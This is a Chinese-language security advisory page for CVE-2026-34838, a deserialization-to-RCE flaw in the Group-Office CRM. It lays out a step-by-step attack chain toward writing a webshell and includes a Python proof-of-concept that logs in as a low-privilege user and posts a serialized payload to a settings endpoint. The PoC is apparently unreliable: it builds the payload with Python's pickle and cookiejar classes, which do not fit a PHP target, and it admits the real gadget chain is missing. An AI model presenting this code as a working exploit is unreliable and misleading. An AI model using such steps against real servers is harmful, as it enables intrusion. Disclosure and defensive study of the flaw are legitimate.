IPBUF安全漏洞报告
English
CVE-2026-34838 CVSS 9.9 严重

CVE-2026-34838 Group-Office反序列化导致RCE漏洞

披露日期: 2026-04-02
来源: [email protected]

漏洞信息

漏洞编号
CVE-2026-34838
漏洞类型
远程代码执行
CVSS评分
9.9 严重
攻击向量
网络 (AV:N)
认证要求
低权限 (PR:L)
用户交互
无需交互 (UI:N)
影响产品
Group-Office

相关标签

RCE远程代码执行反序列化漏洞Group-Office任意文件写入CVE-2026-34838

漏洞概述

Group-Office是企业级CRM和群件工具。在6.8.156、25.0.90和26.0.12版本之前,AbstractSettingsCollection模型中存在不安全的反序列化漏洞。攻击者可利用该漏洞在设置字符串中注入序列化的FileCookieJar对象,从而实现任意文件写入,最终导致服务器上的远程代码执行(RCE)。该漏洞CVSS评分高达9.9,危害极大。

技术细节

该漏洞的核心在于Group-Office的AbstractSettingsCollection模型没有正确验证用户提交的设置数据,直接进行了反序列化操作。攻击者首先需要拥有一个低权限的账户身份。随后,攻击者利用反序列化机制,构造一个恶意的FileCookieJar对象序列化字符串。当系统加载该设置并尝试反序列化时,FileCookieJar对象会被还原,其内部属性允许攻击者指定服务器上的任意路径并写入数据。通过精心构造数据,攻击者可以写入Webshell文件或破坏系统配置,从而在服务器端执行任意系统命令,获取最高权限。整个利用过程无需用户交互,危害极高。

攻击链分析

STEP 1
信息收集
识别目标使用的Group-Office版本,确认其版本低于6.8.156、25.0.90或26.0.12。
STEP 2
获取凭证
获取一个低权限的合法账户凭据,因为漏洞利用需要身份认证(PR:L)。
STEP 3
构造Payload
利用FileCookieJar类构造恶意的序列化对象,该对象旨在执行任意文件写入操作。
STEP 4
注入Payload
通过低权限账户,将包含恶意序列化对象的字符串注入到AbstractSettingsCollection模型的设置接口中。
STEP 5
触发反序列化
服务器端加载设置时触发反序列化,FileCookieJar对象被还原,导致恶意文件被写入服务器。
STEP 6
执行代码
访问写入的恶意文件(如Webshell),在服务器上执行任意系统命令,完成RCE。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
import requests import pickle from http.cookiejar import FileCookieJar # Target configuration target_url = "http://target-group-office-url.com" username = "attacker" password = "password" login_endpoint = "/go.php/auth/login" settings_endpoint = "/go.php/settings/save" # 1. Authenticate as a low-privilege user session = requests.Session() login_data = {"username": username, "password": password} session.post(target_url + login_endpoint, data=login_data) # 2. Generate malicious payload (FileCookieJar object) # The goal is to leverage this object to write a file (e.g., webshell) # Note: Actual payload depends on the specific gadget chain in Group-Office malicious_jar = FileCookieJar("/var/www/html/group-office/rce.php") # In a real scenario, the jar content would be manipulated to contain PHP code # For demonstration purposes, we simulate the serialization process #攻击链:序列化恶意对象 -> 注入Settings -> 触发反序列化 -> 写入Webshell payload_data = pickle.dumps(malicious_jar) # 3. Inject payload into the vulnerable setting parameter exploit_data = { "setting_name": "AbstractSettingsCollection", "setting_value": payload_data # Injecting serialized object } # 4. Send the request to trigger the vulnerability response = session.post(target_url + settings_endpoint, data=exploit_data) if response.status_code == 200: print("[+] Payload sent successfully. Check for uploaded shell.") else: print("[-] Exploit failed.")

影响范围

Group-Office < 6.8.156
Group-Office < 25.0.90
Group-Office < 26.0.12

防御指南

临时缓解措施
建议立即检查系统中Group-Office的版本,如果无法立即升级,请严格限制对设置接口的访问权限,并密切监控服务器上是否存在异常的文件写入行为或异常的反序列化活动。

参考链接

法律声明

以上信息仅供安全研究和授权渗透测试使用。未经授权对他人系统进行测试属于违法行为。利用本报告内容进行非法活动者,后果自负。

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表